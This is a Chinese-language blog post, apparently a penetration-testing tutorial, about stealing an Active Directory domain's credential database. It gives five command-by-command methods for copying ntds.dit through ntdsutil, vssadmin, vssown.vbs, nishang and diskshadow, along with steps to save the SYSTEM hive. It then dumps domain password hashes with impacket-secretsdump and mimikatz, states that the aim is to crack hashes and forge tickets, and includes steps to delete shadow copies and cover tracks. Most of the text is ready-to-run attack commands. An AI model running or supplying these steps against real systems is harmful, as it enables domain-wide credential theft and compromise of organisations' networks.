作者 小苏
提取ntds.dit:
ntds.dit作用:
保存了所有目录活动数据,可以破译进行hash获取制作票据
方法一:通过ntdsutil.exe提取ntds.dit
指令:
ntdsutil snapshot “activate instance ntds” create quit quit
1.创建快照保存其中GUID值
{351d4f2c-7eed-431c-be9a-33f60df84733}
2.加载快照
指令:
ntdsutil snapshot “mount {351d4f2c-7eed-431c-be9a-33f60df84733}” quit quit
这一步可以看到被加载到哪一个目录下
3.将ntds.dit复制出来
指令:
copy C:\\$SNAP_202201071706_VOLUMEC$\\Windows\\NTDS\\ntds.dit C:\\Users\\liukaifeng01\\Desktop
5.确认删除,提裤子
ntdsutil snapshot “List All” quit quit
方法二:vssadmin提取ntds.dit
1.创建c盘卷影拷贝
指令:
vssadmin create shadow /for=c:
2.在创建的卷影里将ntds.dit复制出来
指令:
copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy11\\windows\\NTDS\\ntds.dit c:\\ntds.dit
3.删除创建的卷影
指令:
vssadmin delete shadows /for=c: /quiet
方法三:利用 vssown.vbs脚本提取
1.启动拷贝卷影的服务
cscript vssown.vbs /start
2.创建c盘卷影
cscript vssown.vbs /create c
3.列出当前的拷贝卷影
cscript vssown.vbs /list
4.拷贝出文件
copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy7\\windows\\NTDS\\ntds.dit c:\\ntds.dit
5.删除卷影
cscript vssown.vbs /delete {3D20A65B-9BF8-426A-A15A-92BC04879EF7}//GUID
方法四: 利用ntdsutil IFM功能创建卷影拷贝
1.创建IFM媒体
指令:
ntdsutil “ac i ntds” “ifm” “create full c:/test” q q
2.将ntds.dit和system复制到目录下
指令:
dir “c:\\test\\Active Directory”
dir “c:\\test\\registry”
3.复制出ntds文件删除test文件夹
指令:
rmdir /s /q test
4.可以利用nishang的脚本进行复制
指令:
Import-Module .\\Copy-VSS.ps1
Copy-vss
方法五:diskshadow导出ntds.dit文件
这是微软自带的软件,可以执行txt里的指令
指令:
diskshadow /s c:\\1.txt
TXT内容:
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% k:
exec “cmd.exe” /c copy K:\\Windows\\NTDS\\ntds.dit c:\\ntds.dit
delete shadows all
list shadows all
reset
exit
再将system.hive提取
reg save hklm\\system c:\\windows\\temp\\system.hive
导出ntds.dit的散列值:
方法一:使用 impacket包导出
前提:导出ntds.dit必须要有system文件
指令:
impacket-secretsdump -system SYSTEM -ntds ntds.dit LOCAL
方法二:mimikatz获取域散列值
指令:
privilege::debug
lsadump::lsa /inject
最新评论
Thanks for your blog, nice to read. Do not stop.
1
1
你图片显示不了
你的网站怎么注册啊